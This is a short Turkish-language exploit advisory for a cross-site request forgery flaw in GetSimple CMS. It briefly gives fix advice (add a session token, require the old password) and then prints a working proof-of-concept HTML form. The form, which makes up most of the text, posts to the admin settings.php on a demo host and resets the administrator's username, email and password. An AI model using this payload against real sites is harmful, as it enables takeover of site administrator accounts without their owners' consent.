< ------------------- header data start ------------------- >

#############################################################

# Application Name : GetSimple CMS

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir !

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir, Eski sifre sorulmalidir ..

# author : _iLLeqaL_ ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >


<form class=largeform action=http://demo.opensourcecms.com/getsimple/admin/settings.php method=post >
<input class=text name=user type=text value=admin /><br>
<input class=text name=email type=text value=[email protected] /><br>
<input class=text name=sitepwd type=password value= />(Sifre)<br>
<input class=text name=sitepwd_confirm type=password value= />(Tekrar Sifre)<br>
<input class=submit type=submit name=submitted value=Kaydet ! />
</form>

< -- bug code end of -- >